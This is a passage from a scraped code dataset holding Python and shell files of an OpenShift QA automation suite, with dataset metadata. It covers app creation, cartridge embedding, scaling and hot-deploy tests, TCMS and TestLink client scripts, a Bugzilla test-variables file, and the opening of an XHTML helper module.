%s/\" % (WORK_DIR + \"/../\", self.app_name),\n expect_description = \"Operation must be successfull\",\n expect_return = 0\n ))\n\n self.steps_list.append(testcase.TestCaseStep(\n \"git push codes\",\n \"cd %s && git add . && git commit -am 'update app' && git push\" % self.app_name,\n expect_description = \"git push should pass without errors\",\n expect_return = 0\n ))\n\n self.steps_list.append(testcase.TestCaseStep(\n \"Check MySql Result\",\n self.check_mysql_result,\n expect_description = \"Checking MySQL operation via web must pass\",\n expect_return = 0\n ))\n\n self.steps_list.append(testcase.TestCaseStep(\n \"Scale-up the application via Rest API\",\n common.scale_up,\n function_parameters = [ self.app_name,],\n expect_description = \"The application must scale-up successfully\",\n expect_return = 0\n ))\n \n for i in range(1,4):\n self.steps_list.append(testcase.TestCaseStep(\n \"Check MySql Result - %d\" % i,\n self.check_mysql_result,\n expect_description = \"Checking MySQL operation via web must be successfull\",\n expect_return = 0\n ))\n\n self.steps_list.append(testcase.TestCaseStep(\n \"Scale-down the application via Rest API\",\n common.scale_down,\n function_parameters = [ self.app_name,],\n expect_description = \"The application must scale-down successfully\",\n expect_return = 0,\n try_interval=5,\n try_count=6,\n ))\n\n self.steps_list.append(testcase.TestCaseStep(\n \"Check MySql Result - again\",\n self.check_mysql_result,\n expect_description = \"Checking MySQL operation via web must be successfull\",\n expect_return = 0\n ))\n\n self.steps_list.append(testcase.TestCaseStep(\n \"Remove mysql from %s\" % self.app_name,\n common.embed,\n function_parameters = [ self.app_name, \"remove-\" + common.cartridge_types[\"mysql\"] ],\n expect_description = \"Remoevd mysql should pass\",\n expect_return = 0\n ))\n\n case = testcase.TestCase(\"[US2006][Runtime][rhc-cartridge]Embed mysql to scalable apps: ruby\", self.steps_list)\n case.run()\n \n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n \n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(RubyMysqlScaling)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6089770197868347, "alphanum_fraction": 0.6154488325119019, "avg_line_length": 38.25409698486328, "blob_id": "f482338ad8e1461d74065fd2be63258372e08141", "content_id": "aeac1fb21e70e48d1dc41b24a786cab9b48b1fb6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4790, "license_type": "no_license", "max_line_length": 206, "num_lines": 122, "path": "/automation/open/testmodules/RT/cartridge/jenkins_client_auotmatically_removed.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n\"\"\"\nAttila Nagy\[email protected]\nFeb 14, 2012\n\n[Runtime]Embedded jenkins client should be removed automatically after remove jenkins app\nhttps://tcms.engineering.redhat.com/case/136548/\n\"\"\"\n\nimport os\nimport sys\nimport shutil\nimport commands\nimport re\n\nimport testcase\nimport common\nimport OSConf\nimport rhtest\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.summary = \"[Runtime]Embedded jenkins client should be removed automatically after remove jenkins app\"\n try:\n test_name = self.config.test_variant\n except:\n self.info(\"Missing OPENSHIFT_test_name, using `python` as default\")\n test_name = 'python'\n\n self.app_type = common.app_types[test_name]\n self.app_name1 = 'my%s%s' % ( test_name, common.getRandomString() )\n self.app_name2 = 'my%s%s' % ( test_name, common.getRandomString() )\n self.steps= []\n self.jenkins_name = \"jenkins\"\n\n common.env_setup()\n\n def finalize(self):\n os.system(\"rm -rf %s %s\"%(self.app_name1, self.app_name2))\n common.destroy_app(self.jenkins_name, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, True)\n\nclass JenkinsClientAutomaticallyRemoved(OpenShiftTest):\n def check_jenkins_client(self, app_name):\n (ret, output) = common.command_getstatusoutput(\"rhc app show %s -l %s -p '%s' %s\" % (app_name, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS))\n if ret != 0:\n return False\n if re.search(r'jenkins-client', output) == None:\n return True\n else:\n return False\n\n def test_method(self):\n self.steps.append(testcase.TestCaseStep(\n 'Creating Jenkins app',\n common.create_app,\n function_parameters = [ self.jenkins_name, common.app_types['jenkins'], self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, False ],\n expect_description = 'Jenkins app should be created successfully',\n expect_return = 0))\n\n for a in [ self.app_name1, self.app_name2 ]:\n self.steps.append(testcase.TestCaseStep(\n 'Creating application: %s' % ( a ),\n common.create_app,\n function_parameters=[a, self.app_type, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, False ],\n expect_description = 'The app should be created successfully',\n expect_return = 0))\n\n for a in [ self.app_name1, self.app_name2 ]:\n self.steps.append(testcase.TestCaseStep(\n 'Embedding Jenkins client to the application %s' % ( a ),\n common.embed,\n function_parameters = [ a, 'add-%s' % ( common.cartridge_types['jenkins'] ), self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd ],\n expect_description = 'Jenkins client cartridge should be embedded successfully',\n expect_return = 0,\n try_count=3,\n try_interval=5))\n\n self.steps.append(testcase.TestCaseStep(\n 'Deleting Jenkins app',\n \"rhc app delete %s -l %s -p '%s' --confirm %s\" \n % (self.jenkins_name, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_description = 'Jenkins app should be destroyed + jenkins client cartridge should be removed from applications',\n expect_return = 0))\n\n for app_name in [self.app_name1, self.app_name2]:\n self.steps.append(testcase.TestCaseStep(\n \"Check if jenkins client has been removed from app: %s\" % (app_name),\n self.check_jenkins_client,\n function_parameters = [app_name,],\n expect_description = \"Jenkins client shouldn't exist in the cartridges of app\",\n expect_return = True))\n\n\n case = testcase.TestCase(self.summary, self.steps)\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(JenkinsClientAutomaticallyRemoved)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.6951788663864136, "alphanum_fraction": 0.7013996839523315, "avg_line_length": 19.0625, "blob_id": "77b58ac4f3d8946754ca9e89c8ae172613e5b3b4", "content_id": "8acbc95bbcf65035d39169ed152edffcdb52744d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 643, "license_type": "no_license", "max_line_length": 72, "num_lines": 32, "path": "/automation/Example/variables.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\"\"\"\nVariable file for Bugzilla XML-RPC tests.\nInclude this variable file to your test suite file via Variables keyword\n or from command line with --variablefile/-V option.\n\nAuthor: Xin Gao <[email protected]>\n\"\"\"\n\n# OS\ntest_os = 'Fedora'\n\n\n# Web Browser\nBROWSER = 'Firefox'\n\n\n# Environments\nTEST_ENV = 'https://bzweb01-qe.app.eng.rdu.redhat.com'\nDEV_ENV = 'https://bzweb01-devel.app.eng.rdu.redhat.com'\nSTAGE_ENV = 'https://partner-bugzilla.redhat.com'\n\nEXECUTE_ENV= TEST_ENV\n\n\n\n# Login\nPASSWORD = 'redhat'\nSUPER_ACCOUNT = '[email protected]'\nADMIN_ACCOUNT = '[email protected]'\nREDHAT_ACCOUNT = '[email protected]'\nUNPRIVILEGED_ACCOUNT = '[email protected]'\nDISABLED_ACCOUNT = '[email protected]'\n\n" }, { "alpha_fraction": 0.5471421480178833, "alphanum_fraction": 0.5652173757553101, "avg_line_length": 25.921052932739258, "blob_id": "8b4ba5df8abc92accb14a22af4b700e695b5543c", "content_id": "75acc8b0d1959057f91566df39f049113924201e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2047, "license_type": "no_license", "max_line_length": 69, "num_lines": 76, "path": "/automation/open/bin/refresh_testrun_by_tag.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n'''\n File name: refresh_testrun_by_tag.py\n Date: 2012/06/08 11:43\n Author: [email protected]\n\n Only CONFIRMED & Auto testcases will be fetched with given TAG\n'''\nimport sys\nimport re\nimport os\nfile_path = os.path.dirname(os.path.realpath(__file__))\nlib_path = os.path.abspath(file_path + \"/../lib\")\nsys.path.append(lib_path)\nfrom tcms import TCMS\n\ndef main():\n if (len(sys.argv)<3):\n print \"ERROR: Usage python %s <TESTRUN_ID> <TAG>\"%sys.argv[0]\n sys.exit(2)\n\n sys.argv.pop(0)\n testrun_id = sys.argv.pop(0)\n tcmsobj = TCMS()\n #1. get current list of testcases...\n all_tcs = {}\n new_tcs = {}\n for tc in tcmsobj.server.TestRun.get_test_cases(testrun_id):\n all_tcs[tc['case_id']]=1\n\n for tag in sys.argv:\n print 'Appending tag: ', tag\n\n #2. get all automated+confirmed testcases per tag\n f = {'plan':4962, \n 'case_status':2, #confirmed\n 'is_automated': 1,\n 'tag__name': tag}\n testcases_by_tag = tcmsobj.server.TestCase.filter(f)\n\n #3. prepare list of testcases...\n for tc in testcases_by_tag:\n if all_tcs.has_key(tc['case_id']):\n all_tcs[tc['case_id']]='OK'\n else: #new one\n new_tcs[tc['case_id']]=2\n\n #4. remove all==1\n to_remove = []\n for tc in all_tcs.keys():\n if all_tcs[tc] == 1: #to remove\n to_remove.append(tc)\n del all_tcs[tc]\n elif all_tcs[tc] == 'OK': #skip existing\n del all_tcs[tc]\n\n if len(to_remove)>0:\n print \"Removing %s testcases...\"%len(to_remove)\n tcmsobj.server.TestRun.remove_cases(testrun_id, to_remove)\n\n #5. add them all to the given testrun\n try:\n print \"Appending %s new testcases...\"%len(new_tcs.keys())\n tcmsobj.server.TestRun.add_cases(testrun_id, new_tcs.keys())\n except Exception as e:\n print 'ERROR:', str(e)\n return 254\n\n return 0\n\n\nif __name__ == \"__main__\":\n main()\n\n# end of reset_testrun.py \n" }, { "alpha_fraction": 0.6240310072898865, "alphanum_fraction": 0.6279069781303406, "avg_line_length": 24.799999237060547, "blob_id": "a7b76273bf591c1496b587fdbce67d4952e478d0", "content_id": "38054cc7a575ce2577a465560f8f57967b2b259d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 258, "license_type": "no_license", "max_line_length": 52, "num_lines": 10, "path": "/automation/listenertest/PleaseWait.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "import tkMessageBox\nfrom Tkinter import Tk\n \n \nROBOT_LISTENER_API_VERSION = 2\n \ndef start_test(name, attributes):\n Tk().withdraw() # Remove root window\n tkMessageBox.showinfo(\"Please click 'OK'...\",\n \"Test Case Name: \" + name)\n" }, { "alpha_fraction": 0.5712057948112488, "alphanum_fraction": 0.5810810923576355, "avg_line_length": 31.610170364379883, "blob_id": "afc8b65dd7e7adaab9d9107c5489c3d71d2dfba2", "content_id": "7e8016adf8538cfadc43fc4c609729886f3ea17a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1924, "license_type": "no_license", "max_line_length": 184, "num_lines": 59, "path": "/automation/open/testmodules/RT/hot_deploy/ruby18_without_jenkins.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n\"\"\"\nAttila Nagy\nAug 28, 2012\n\n\n\"\"\"\nimport rhtest\nimport common\nfrom hot_deploy_test import HotDeployTest\nimport fileinput\nimport re\n\nclass Ruby18HotDeployWithoutJenkins(HotDeployTest):\n \n def __init__(self, config):\n rhtest.Test.__init__(self, config)\n self.config.application_name = common.getRandomString()\n self.config.application_type = common.app_types['ruby']\n self.config.scalable = False\n self.config.jenkins_is_needed = False\n self.config.summary = \"[US2443]Hot deployment support for application - without Jenkins - ruby-1.8\"\n \n def configuration(self):\n self.log_info(\"Creating the application to check PID\")\n self.config.file_name = \"pid\"\n self.info(\"Editing file '%s'...\" % 'config.ru')\n try:\n for line in fileinput.input(\"./%s/config.ru\" % ( self.config.application_name ), inplace = True):\n if re.search(r'map.+health.+do', line):\n print \"map '/pid' do\"\n print \" pidcheck = proc do |env|\"\n print \" [ 200, { 'Content-Type' => 'text/plain'}, [File.open(ENV['OPENSHIFT_HOMEDIR'] + '/%s/run/httpd.pid').readline().chomp()]]\" % self.config.application_type\n print \" end\"\n print \" run pidcheck\"\n print \"end\"\n print\n print line,\n except Exception as e:\n fileinput.close()\n print type(e)\n print e.args\n self.fail(\"Configuration of the test-application must be successful\")\n finally:\n fileinput.close()\n self.deploy()\n \nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(Ruby18HotDeployWithoutJenkins)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6385390162467957, "alphanum_fraction": 0.6442065238952637, "avg_line_length": 35.09090805053711, "blob_id": "b78405cff3dd9f3b984bd4ca58a456bb24d58537", "content_id": "431c364bb0d7c50a7643bea0887ca78cbd6f5792", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1588, "license_type": "no_license", "max_line_length": 144, "num_lines": 44, "path": "/automation/robot_to_testlink/TestlinkAPIClient.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\nimport xmlrpclib\nfrom time import strftime\n\nclass TestlinkAPIClient:\n # substitute your server URL Here\n SERVER_URL = \"http://yourdomain/testlink/lib/api/xmlrpc.php\"\n\n def __init__(self, devKey, testplanID, buildNotes):\n self.server = xmlrpclib.Server(self.SERVER_URL)\n self.devKey = devKey\n self.testplanID = testplanID\n self.buildNotes = buildNotes\n buildName = strftime(\"%Y-%m-%d_%H%M%S\")\n self.buildName = buildName\n\n def reportTCResult(self, tcid, buildid, status, testRunNotes):\n data = {\"devKey\":self.devKey, \"testcaseid\":tcid, \"testplanid\":self.testplanID, \"buildid\":buildid, \"status\":status, \"notes\":testRunNotes}\n return self.server.tl.reportTCResult(data)\n\n def getInfo(self):\n return self.server.tl.about()\n\n def createBuild(self):\n data = {\"devKey\":self.devKey, \"testplanid\":self.testplanID, \"buildname\":self.buildName, \"buildnotes\":self.buildNotes}\n print \"Build Name %s created\" % data[\"buildname\"]\n x = self.server.tl.createBuild(data)\n out = x[0]\n buildID = out['id']\n print \"Build ID is %s\" % buildID\n return (buildID)\n\n def getTestCaseIDFromTestName(self, testcaseName):\n x1 = testcaseName.split(\"-\")\n x2 = x1[0]\n x3 = x2.split(\"_\")\n testcaseID = x3[1]\n return (testcaseID)\n\n def existingBuild(self):\n data = {\"devKey\":self.devKey, \"testplanid\":self.testplanID}\n existingBuild = self.server.tl.getLatestBuildForTestPlan(data)\n return existingBuild['id']\n" }, { "alpha_fraction": 0.6102257370948792, "alphanum_fraction": 0.6218459606170654, "avg_line_length": 34.845237731933594, "blob_id": "39900a3ca56a091595fe02909d2a0dc1601eb294", "content_id": "c71e02611dce911f0c362582e8fea73f0ab7187b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3012, "license_type": "no_license", "max_line_length": 108, "num_lines": 84, "path": "/automation/open/testmodules/RT/node/restart_libra_service.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\"\"\"\nJianlin Liu\[email protected]\nDec 30, 2011\n[rhc-node] All created applications will restart when restart libra service as root\nhttps://tcms.engineering.redhat.com/case/122333/?from_plan=4962\n\"\"\"\n\nimport sys\nimport os\n\nimport testcase, common, OSConf\nimport rhtest\n\nclass OpenShiftTest(rhtest.Test):\n ITEST=\"DEV\"\n def initialize(self):\n self.summary = \"[rhc-node] All created applications will restart when restart libra service as root\"\n self.libra_server = common.get_instance_ip()\n self.app_name = \"myapp\"\n self.app_type = common.app_types[\"php\"]\n self.steps_list = []\n common.env_setup()\n tcms_testcase_id=122333\n\n def finalize(self):\n os.system(\"rm -rf %s\"%(self.app_name))\n\nclass RestartLibraServiceDevenv(OpenShiftTest):\n def test_method(self):\n testcase.TestCaseStep(\"Create an app\",\n common.create_app,\n function_parameters=[self.app_name, self.app_type, \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd, False],\n expect_return=0).run()\n \n def get_pgrep_command():\n uuid = OSConf.get_app_uuid(self.app_name)\n return 'pgrep -u %s -P 1'%uuid\n\n self.info(\"Log into express server, get app's process ID\")\n (status, output) = common.run_remote_cmd_as_root(get_pgrep_command())\n self.assert_equal(status,0, \"SSH Command must be run successfully\")\n pid1=output\n self.assert_equal(status,0, \"SSH Command must be run successfully\")\n\n self.info(\"Log into express server, restart libra service\")\n (status, output) = common.run_remote_cmd_as_root('/etc/init.d/libra restart')\n self.assert_equal(status,0, \"SSH Command must be run successfully\")\n\n self.info(\"Log into express server, get app's process ID\")\n (status, output) = common.run_remote_cmd_as_root(get_pgrep_command()) \n self.assert_equal(status,0, \"SSH Command must be run successfully\")\n pid2=output\n\n\n testcase.TestCaseStep(\"Access app's URL to confirm it is running fine\",\n \"curl -H 'Pragma: no-cache' %s\",\n string_parameters = [OSConf.get_app_url_X(self.app_name)],\n expect_return=0,\n expect_string_list=[\"Welcome to OpenShift\"],\n expect_description=\"Access page successfully\").run()\n\n if pid1 == pid2:\n self.info(\"App's process id before and after restart libra service does not have any change.\")\n return self.failed(\"%s failed\" % self.__class__.__name__)\n else:\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(RestartLibraServiceDevenv)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.7076700329780579, "alphanum_fraction": 0.7221418023109436, "avg_line_length": 24.592592239379883, "blob_id": "4720dd55fb8715a32350928c13846a44e83cc317", "content_id": "bae2052eba1d2c6f835a7aa63578609d6144ce32", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 691, "license_type": "no_license", "max_line_length": 111, "num_lines": 27, "path": "/automation/open/testmodules/RT/hot_deploy/php_scaling_without_jenkins.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n\"\"\"\nAttila Nagy\nSept 26, 2012\n\"\"\"\nimport rhtest\nimport common\nfrom php_without_jenkins import PHPHotDeployWithoutJenkins\n\nclass PHPScalingHotDeployWithoutJenkins(PHPHotDeployWithoutJenkins):\n def __init__(self, config):\n PHPHotDeployWithoutJenkins.__init__(self, config)\n self.config.scalable = True\n self.config.summary = \"[US2443] Hot deployment support for scaling application - php - without jenkins\"\n \nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(PHPScalingHotDeployWithoutJenkins)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6180945038795471, "alphanum_fraction": 0.6293034553527832, "avg_line_length": 24.489795684814453, "blob_id": "3cfac37221b32b603ef6524e670db011ee1a69c6", "content_id": "adc503d8eaaa5e58cf76178a59fdc1c655af8f95", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1249, "license_type": "no_license", "max_line_length": 91, "num_lines": 49, "path": "/automation/open/testmodules/UI/Demo01.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n\"\"\"\nDemo for UI autotesting\n\"\"\"\nimport rhtest\nimport common \n\nclass OpenShiftTest(rhtest.Test): \n INTERACTIVE = False\n\n def initialize(self):\n self.domain_name = common.get_domain_name()\n self.new_domain = common.getRandomString(10)\n common.env_setup()\n\n def finalize(self):\n pass\n\n\nclass Demo01(OpenShiftTest):\n def test_method(self):\n web = self.config.web\n #1 create an domain via REST\n self.info(\"Altering domain to %s\"%self.new_domain)\n (status, rest) = self.config.rest_api.domain_update(self.new_domain)\n self.assert_equal('OK', status, 'Unable to alter domain to %s'%self.new_domain)\n\n #2. let's check the domain via UI\n web.go_to_home()\n web.go_to_signin()\n web.login()\n web.go_to_account()\n web.assert_text_equal_by_xpath(self.new_domain, \n '''id('content')/div/div/div/div[2]/div/div/div[1]/section[2]/div[1]/strong''')\n\n return self.passed(\"UI Demo01 test passed.\")\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(Demo01)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6590909361839294, "alphanum_fraction": 0.6590909361839294, "avg_line_length": 10, "blob_id": "8ccf9def9f42c5447817826567264f2b2b79db46", "content_id": "eeca0081ea889f59bbfc6721ae4fcd542a10f306", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 44, "license_type": "no_license", "max_line_length": 15, "num_lines": 4, "path": "/automation/open/Longevity/delete_all.sh", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/bin/bash\n. ./function.sh\n\napp_delete_all\n" }, { "alpha_fraction": 0.6053943634033203, "alphanum_fraction": 0.6194469332695007, "avg_line_length": 43.55555725097656, "blob_id": "89df0a40b6fc5dd1d410da6f0b7969982536332a", "content_id": "7a0084f3a10a8cc7ad9d71a8a46bfc381744f9b3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4412, "license_type": "no_license", "max_line_length": 593, "num_lines": 99, "path": "/automation/open/testmodules/RT/cartridge/perl_dancer_application.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\"\"\"\nJiangtao Zhao\[email protected]\nFeb 10, 2012\n[US478][rhc-cartridge]Perl cartridge: Perl Dancer application\nhttps://tcms.engineering.redhat.com/case/122403/\n\"\"\"\nimport os,sys\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\n\nimport testcase,common,OSConf\nimport rhtest\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.summary = \"[US478][rhc-cartridge]Perl cartridge: Perl Dancer application\"\n self.app_name = \"dancer\"\n self.app_type = common.app_types[\"perl\"]\n self.git_repo = os.path.abspath(os.curdir)+os.sep+self.app_name\n self.steps_list = []\n\n common.env_setup()\n\n def finalize(self):\n os.system(\"rm -rf %s\"%(self.app_name))\n\nclass PerlDancerApplication(OpenShiftTest):\n def test_method(self):\n\n # 1.Create an app\n self.steps_list.append( testcase.TestCaseStep(\"1. Create an perl app\",\n common.create_app,\n function_parameters=[self.app_name, self.app_type, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd],\n expect_description=\"the app should be created successfully\",\n expect_return=0))\n\n # 2.Setup perl config(No check)\n cmd = \"mkdir -p /usr/share/perl5/CPAN/ ; rm -f /usr/share/perl5/CPAN/Config.pm ; cp %s/app_template/Config.pm /usr/share/perl5/CPAN/Config.pm ; rm -rf /$HOME/.cpan\" % (WORK_DIR)\n self.steps_list.append( testcase.TestCaseStep(\"2.Setup perl config(No check)\",\n cmd,\n expect_description=\"Successfully setup perl config\"))\n\n # 3.Install dancer and dependencies from CPAN\n cmd = \"cd %s/app_template && tar xzf local-lib-1.008004.tar.gz && cd local-lib-1.008004 && perl Makefile.PL --bootstrap=~/dancerlocalperl && make install && echo 'eval $(perl -I$HOME/dancerlocalperl/lib/perl5 -Mlocal::lib=$HOME/dancerlocalperl)' >>~/localperlshell && source ~/localperlshell && export PERL_MM_USE_DEFAULT=1 && cpan YAML Dancer Plack::Handler::Apache2 && cd %s && dancer -a myapp && git rm -r perl && ln -s myapp/public perl && cd libs && ln -s ../myapp/lib/myapp.pm . && cd .. && echo 'YAML\\nDancer\\nPlack::Handler::Apache2' >> deplist.txt\" % (WORK_DIR, self.git_repo)\n self.steps_list.append( testcase.TestCaseStep(\"3.Install dancer and dependencies from CPAN\",\n cmd,\n expect_description=\"dancer should be installed successfully\",\n expect_return=0))\n\n # 4.Create the index.pl\n cmd = \"cd %s/perl && cp dispatch.cgi index.pl && sed -i -e 's/.*use FindBin.*//g' index.pl && sed -i -e \\\"12s/RealBin.*/ENV{'DOCUMENT_ROOT'}, '..', 'myapp', 'bin', 'app.pl');/g\\\" index.pl\" % (self.git_repo)\n self.steps_list.append( testcase.TestCaseStep(\"4.Create the index.pl\",\n cmd,\n expect_description=\"index.pl should be created\",\n expect_return=0))\n\n # 5. Git push all the changes\n self.steps_list.append( testcase.TestCaseStep(\"5.Git push all the changes\",\n \"cd %s && git add -A && git commit -a -m 'lets dance' && git push\" % (self.git_repo),\n expect_description=\"index.pl should be created\",\n expect_return=0))\n\n # 6.Check app via browser\n test_html = \"Perl is dancing\"\n self.steps_list.append( testcase.TestCaseStep(\"6.Check app via browser\",\n common.grep_web_page,\n function_parameters=[OSConf.get_app_url_X(self.app_name), test_html, \"-H 'Pragma: no-cache'\", 5, 9],\n expect_description=\"'%s' should be found in the web page\" % (test_html),\n expect_return=0))\n\n case = testcase.TestCase(self.summary, self.steps_list)\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(PerlDancerApplication)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.7112375497817993, "alphanum_fraction": 0.7254623174667358, "avg_line_length": 24.10714340209961, "blob_id": "5fec41600ae5d9bd7964993c73d860fad54f2e5e", "content_id": "47983b0a3d11bb9247665ce20660d29cd638c487", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 703, "license_type": "no_license", "max_line_length": 119, "num_lines": 28, "path": "/automation/open/testmodules/RT/hot_deploy/jbosseap_scaling_without_jenkins.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n\"\"\"\nAttila Nagy\nNov 6, 2012\n\"\"\"\n\nimport rhtest\nimport common\nfrom jbosseap_without_jenkins import EAPHotDeployWithoutJenkins\n\nclass EAPScalingHotDeployWithoutJenkins(EAPHotDeployWithoutJenkins):\n def __init__(self, config):\n EAPHotDeployWithoutJenkins.__init__(self, config)\n self.config.scalable = True\n self.config.summary = \"[US2443] Hot deployment support for scalable application - without Jenkins - jbossaeap6\"\n \nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(EAPScalingHotDeployWithoutJenkins)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6645016074180603, "alphanum_fraction": 0.6698101162910461, "avg_line_length": 25.55223846435547, "blob_id": "41014627808acb8e776c0e74efed4e21287c29c4", "content_id": "c7785fc38be2bcf235c890c6b22d83189846405d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 16012, "license_type": "no_license", "max_line_length": 120, "num_lines": 603, "path": "/automation/open/lib/supports/XML/XHTML.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n# vim:ts=4:sw=4:softtabstop=0:smarttab\n# License: LGPL\n# Keith Dart <[email protected]>\n\"\"\"\nThis package actually implements the XHTML specification.\n\nthe XHTMLDocument class can be used to construct new XHTML documents.\nThere are many helper methods to construct a document from dtd objects.\n\n\"\"\"\n\nimport sys\nimport re, HTMLParser\nfrom htmlentitydefs import entitydefs\nfrom textutils import identifier\n\nTRUE = Enum(1, \"true\")\nFALSE = Enum(0, \"false\")\n\nimport POM\n\nSTRICT = \"strict\"\nTRANSITIONAL = \"transitional\"\nFRAMESET = \"frameset\"\nDOCTYPES = {}\nDOCTYPES[STRICT] = \"\"\"<!DOCTYPE HTML PUBLIC \"-//W3C//DTD XHTML 1.0 Strict//EN\" \"xhtml1-strict.dtd\">\"\"\"\nDOCTYPES[TRANSITIONAL] = \"\"\"<!DOCTYPE HTML PUBLIC \"-//W3C//DTD XHTML 1.0 Transitional//EN\" \"xhtml1-transitional.dtd\">\"\"\"\nDOCTYPES[FRAMESET] = \"\"\"<!DOCTYPE HTML PUBLIC \"-//W3C//DTD XHTML 1.0 Frameset//EN\" \"xhtml1-frameset.dtd\">\"\"\"\n\nNAMESPACE = \"http://www.w3.org/1999/xhtml\"\n\n# tags known to be inline - use for BeautifulWriter and other type checks\nINLINE_SPECIAL = [\"span\", \"bdo\", \"object\", \"img\", \"map\"]\n# (br is ommitted on purpose - looks better)\nINLINE_FONTSTYLE = [ \"tt\", \"i\", \"b\", \"big\", \"small\"]\nINLINE_PHRASE = [ \"em\", \"strong\", \"dfn\", \"code\", \"samp\", \"kbd\",\n\t\"cite\", \"var\", \"abbr\", \"acronym\", \"q\", \"sub\", \"sup\"]\nINLINE_FORM = [\"input\", 